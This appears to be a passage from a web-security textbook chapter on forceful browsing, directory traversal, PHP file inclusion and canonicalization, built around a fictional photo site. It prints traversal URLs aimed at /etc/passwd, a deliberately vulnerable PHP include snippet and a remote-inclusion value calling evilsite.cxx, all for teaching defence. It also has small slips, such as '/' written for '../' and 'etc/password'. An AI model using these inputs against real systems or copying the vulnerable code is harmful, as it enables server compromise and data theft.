So many people have loved the photos in Dave's photo gallery application that he's decided to make it into a side business and sell prints. On the page www.photos.cxx/view_photo.php, he adds a new button "Buy a Print" that redirects users to www.photos.cxx/buy_print.php. Once they've chosen the size of print that they want, along with any matting or framing options, they get redirected again to www.photos.cxx/billing.php. Here, they give their credit card information so Dave can bill them for their new artwork. Finally, they get redirected to www.photos.cxx/shipping.php where they enter their shipping address. Figure 8-7 shows how this application workflow flows—or at least, how it flows for legitimate, honest users.
Figure 8-7 The legitimate www.photos.cxx print purchase workflow
Unfortunately, while Dave is a very good photographer, his web application security skills are not quite up to the same level of ability. In this case, Dave just assumed that users would follow his implicit workflow, moving from page A to page B to page C the way he intended them to. But he never added any code to ensure this. Miss Black Cat (being a photography lover herself) comes into Dave's gallery, picks a photo she likes on view_photo.php, chooses her print options on buy_print.php, but then skips completely over the billing.php page to go straight to shipping.php. (Cat may be keen on photography, but she was never very big on actually paying for things.) Figure 8-8 shows how Cat bypasses the intended workflow by forcefully browsing her way through the application.
Figure 8-8 An attacker exploits a forceful browsing vulnerability in the www.photos.cxx print purchase workflow.
Your Plan
❏ Always assume that any file or subdirectory you put in a publicly accessible web folder will be found by an attacker. If you want to make sure that only certain people have the right to access those resources, you need to ensure that through proper authorization. Just giving the resources unusual or hard-to-guess names as their only defense is relying on security through obscurity, and you're likely to regret that later.
❏ Configure your web server to disable directory listings.
❏ Return the same HTTP error code when a user makes a request for a page that he's not authorized to view as you do when he makes a request for a page that really doesn't exist. If an attacker sees that his request for www.site.cxx/admin returns a 401 Not Authorized response and his request for a randomly named page like www.site.cxx/qw32on87 returns a 404 Not Found response, then that's a pretty good clue that the /admin resource does exist and is worth further probing.
❏ Remember that unless you add server-side checks, users can visit any page in your application they want to in any order. If you have an implicit workflow to your application, implement server-side state checking on each step of the workflow. This goes for asynchronous RIA calls as well as traditional redirects.
Again, you won't often see forceful browsing vulnerabilities like this in traditional thin-client "Web 1.0" applications, but they are a little more common in RIAs. Ajax and Flex client-side modules sometimes make series of asynchronous calls back to their server-side components. If the application is implicitly relying on these calls happening in a certain order (that is, the "choosePrint" call should be made before the "enterBillingInfo" call, which should be made before the "enterShippingInfo" call), then the exact same type of vulnerability can occur.
Directory Traversal
Virtually every web application attack works on a premise of "tricking" the web application into performing an action that the attacker is unable to directly perform himself. An attacker can't normally directly access an application's database, but he can trick the web application into doing it for him through SQL injection attacks. He can't normally access other users' accounts, but he can trick the web application into doing it for him through cross-site scripting attacks. And he can't normally access the file system on a web application server, but he can trick the application into doing it for him through directory traversal attacks. To show an example of directory traversal, let's return one more time to Dave's photo gallery site.
The main page for www.photos.cxx where users go to see Dave's pictures is the page view_photo.php. The particular picture that gets displayed to the user is passed in the URL parameter "picfile," like this: www.photos.cxx/view_photo.php?picfile=mt_rainier.jpg. Normally a user wouldn't type this address in himself—he would just follow a link from the main gallery page that looks like this:
[sourcecode]
<html>
<body>
...
<a href="view_photo.php?picfile=mt_rainier.jpg">Mount Rainier sunset</a>
<a href="view_photo.php?picfile=space_needle.jpg">Space Needle</a>
<a href="view_photo.php?picfile=troll.jpg">Fremont Bridge Troll</a>
</body>
[/sourcecode]
An attacker may be able to manually change the picfile parameter to manipulate the web application into opening and displaying files outside its normal image file directory, like this: http://www.photos.cxx/view_photo.php?picfile=../private/cancun.jpg. This is called a directory traversal or path traversal attack. In this case, the attacker is attempting to break out of the internal folder where Dave keeps his photos and into a guessed "private" folder. The "/" prefix is a file system directive to "go up" one folder, so the folder "images/public/../private" is really the same folder as "images/private." This is why you'll occasionally hear directory traversal attacks called "dot-dot-slash" attacks.
Directory traversal attacks are similar to forceful browsing in that the attacker is attempting to break out of the intended scope of the application and access files he's not supposed to be able to. In fact, some web application security experts consider directory traversal to be another subcategory of forceful browsing attacks like filename guessing or directory enumeration.
IMHO
If you want to think of directory traversal attacks this way, I think that's fine, but personally I think there's a big enough distinction between them based on the fact that forceful browsing issues are generally web server issues that can be mitigated through appropriate web server configuration; while directory traversal attacks are generally web application issues that need to be fixed through application code changes.
Applications may also be vulnerable to directory traversal vulnerabilities through attacks that encode the directory escape directory. Instead of trying the attack string "/private/cancun.jpg," an attacker might try the UTF-8 encoded variation "%2E%2E%2Fprivate%2Fcancun%2Ejpg." This is a type of canonicalization attack—trying an alternative but equivalent name for the targeted resource—and we'll cover these attacks in more detail later in this chapter.
etc/passwd
The classic example of a directory traversal attack is an attempt to read the /etc/passwd user information file. Etc/passwd is a file found on some Unix-based operating systems that contains a list of all users on the system, their names, e-mail addresses, phone numbers, physical locations: a gold mine of data for a potential attacker.
Note
Even though its name implies otherwise, in modern systems /etc/passwd does not actually contain a list of users' passwords. Early versions of Unix did work this way, but now passwords are kept in a separate, more secure file only accessible by the system root user.
One especially nice thing about /etc/password (from an attacker's perspective) is not just that it has a lot of really interesting and potentially valuable data, it's that there's no guessing involved as to where the file is located on the server. It's always the file "password" located in the directory "etc." Retrieving this file (or any other standard system file always located in the same place) is a lot simpler than trying to blindly guess at files or directories that may not actually exist. The only question is, how far back in the directory structure is it? It may be 1 folder back: http://www.photos.cxx/view_photo.php?picfile=../etc/passwd; or it may be 2 folders back: http://www.photos.cxx/view_photo.php?picfile=../../etc/passwd; or it may be 20 folders back. But even if it is 20 folders back, that's still a lot fewer guesses than an attacker would need to find something like www.photos.cxx/view_photo.php?picfile=../private/cancun.jpg.
More Directory Traversal Vulnerabilities
Even though it's bad enough that attackers can exploit directory traversal vulnerabilities to read other users' confidential data and sensitive system files, there are other possibilities that may be even worse. Imagine what might happen if your web application opened a user-specified file in read-write mode instead of just read-only mode; for example, if you allowed the user to specify the location of a log file or user profile file. An attacker could then overwrite system files, either to crash the system entirely (causing a denial-of-service attack) or in a more subtle attack, to inject his own data. If he could make changes to /etc/passwd, he might be able to add himself as a full-fledged system user. If he could determine the location of the application's database (for instance, if the database connection string were accidentally leaked in a code comment as discussed earlier), then he could make changes to the database directly without having to mess around with complex SQL injection attacks. The possibilities are almost endless.
This attack isn't as farfetched as it might seem, especially if you consider that a web application might easily look for a user profile filename in a cookie and not necessarily in the URL query string.
Tip
Always remember that every part of an HTTP request, including the URL query string, the request body text, headers, and cookies can all be changed by an attacker with an HTTP proxy tool.
File Inclusion Attacks
One exceptionally nasty variant of directory traversal is the file inclusion attack. In this attack, the attacker is able to specify a file to be included as part of the target page's server-side code. This vulnerability is most often seen in PHP code that uses the "include" or "require" functions, but it's possible to have the same issue in many different languages and frameworks. Here's an example of some vulnerable code.
Dave is having great success with the new print purchase feature of his photo gallery application (with the exception of a few security breaches that he's trying to take care of). In order to better serve his customers who are visiting his site with iPhones and Androids, he adds two radio buttons to the main page to allow the user to choose between the full-fledged regular high-bandwidth user interface, or a simpler reduced-bandwidth interface:
[sourcecode]
<html>
<body>
...
<form method="get">
<select name="layout">
<option value="standard.php">Standard layout</option>
<option value="simple.php">Simple layout</option>
</select>
<input type="submit" />
</form>
</body>
[/sourcecode]
In the PHP code, Dave gets the incoming value of the "layout" parameter and then loads that file into the page in order to execute that code and change the page's layout behavior:
[sourcecode]
<?php
$layout = $_GET['layout'];
include($layout);
[/sourcecode]
Of course this code is vulnerable to the same directory traversal attacks we've already discussed; an attacker could make a request for this page with the "layout" parameter set to ../../etc/password or any other system file. But there's a much more serious possibility too. Instead of loading in system files, an attacker could specify his own PHP code from his own server by setting the layout parameter to http://evilsite.cxx/exploit.php. The server would then fetch this code and execute it. If this happens, the attacker would have complete control over the web server just as if he was one of the legitimate developers of the web site.
Into Action
It's best to avoid including source code files based on user-specified filenames. If you must, try hard-coding a specific list of possibilities and letting users select by index rather than name, just as we did to avoid indirect direct object reference vulnerabilities we discussed in Chapter 7. So in this case, Dave would have been better off setting his radio button values to "0" and "1" (or something like that) and then writing PHP to load either "standard.php" when layout is equal to 0 or "simple.php" when layout is equal to 1.
If that's not an option for you, you'll need to canonicalize the filename value and test it before loading that resource. (We'll talk about how to do this next.) Also, if you're using PHP, you should also set the allow_url_fopen configuration setting to "Off," which prohibits the application from loading external resources with the include or require functions.
Canonicalization
You like potato, and I like potahto You like tomato, and I like tomahto Potato, potahto, tomato, tomahto Let's call the whole thing off.
—Louis Armstrong
Human beings often have many different ways of referring to the exact same object. What I call an "elevator," my British friend Mark might call a "lift." What a botanist calls a "Narcissus papyraceus" I call a "daffodil," and my wife Amy (having been raised in the South) calls a "jonquil." (Our cat calls them delicious, as he does with all our other house plants.)
Web servers also often have many different ways of referring to the exact same file. To Dave's photo gallery application, the page "http://www.photos.cxx/my favorite pictures.html" is the same page as "http://www.photos.cxx/MY FAVORITE PICTURES.html" and the same page as "http://www.photos.cxx/My%20Favorite%20Pictures.html" too. It might also be "http://192.168.126.1/my favorite pictures.html," "./my favorite pictures.html," or "c:inetpubwwwrootphotosmyfavo~1.htm." If we were to list out all the possible combination variations of encodings, domain addresses, relative/absolute paths, and capitalization, there would probably be tens if not hundreds of thousands of different ways to refer to this one single file. Figure 8-9 shows an example of just a few of these possibilities, all pointing to the same file on the server.
Figure 8-9 Different filenames all resolving to the same file on the web server
What this means for us in terms of directory traversal attacks is that it's pretty much impossible to prevent directory traversal attacks by testing for specific banned files or directories (also called blacklist testing). If you check to make sure the user isn't trying to load "/etc/passwd", that still means he can load "/ETC/PASSWD" or "/folder/../etc/passwd" or "/etc/passwd%00" or many other variations that end up at the exact same file. Even checking to see whether the filename starts with "/" won't work—maybe the attacker will just specify an absolute filename instead of a relative one.
The solution to the problem is to canonicalize the input value (that is, reduce it to a standard value) before testing it. The canonical representation of "http://www.photos.cxx/ My Favorite Pictures.html" and "http://192.168.126.1/my%20favorite%20pictures.cxx" and all other possible variants of encodings and capitalizations and domain addresses might resolve to one single standard value of "http://www.photos.cxx/my favorite pictures.cxx." Only once a value has been properly canonicalized can you test it for correctness.
Tip
Canonicalization is tricky, so don't try to come up with your own procedure for it. Use the built-in canonicalization functions provided by your application language and framework.
We've Covered
Keeping your source code secret
• The difference between static and dynamic web content
• The difference between interpreted and compiled source code
• Backup file leakage and include file leakage
• Keeping secrets out of publicly visible comments
• Keeping sensitive functionality on the server tier
Security through obscurity
• Obscuring information or functionality can enhance security
• Never rely on obscurity alone
Forceful browsing
• Guessed files and folders
• Insecure direct object references
• Directory enumeration
• HTTP status code information leakage
Directory traversal
• Reading sensitive data: /etc/password
• Writing to unauthorized files
• PHP file inclusion
• Canonicalization
Figure 8-1 An attacker can statically analyze desktop applications, but web applications are like black boxes.
Figure 8-2 The photos.cxx server is configured to process PHP pages as dynamic content.
Figure 8-3 The photos.cxx server is misconfigured to serve PHP files as static content, revealing the application's source code.
Figure 8-4 The Java Decompiler tool reconstructs Java source code from a compiled JAR file.
Figure 8-5 Google Maps uses client-side JavaScript extensively in order to provide a responsive user interface.
Figure 8-6 A directory listing of a guessed folder
Figure 8-7 The legitimate www.photos.cxx print purchase workflow
Figure 8-8 An attacker exploits a forceful browsing vulnerability in the www.photos.cxx print purchase workflow.
Figure 8-9 Different filenames all resolving to the same file on the web server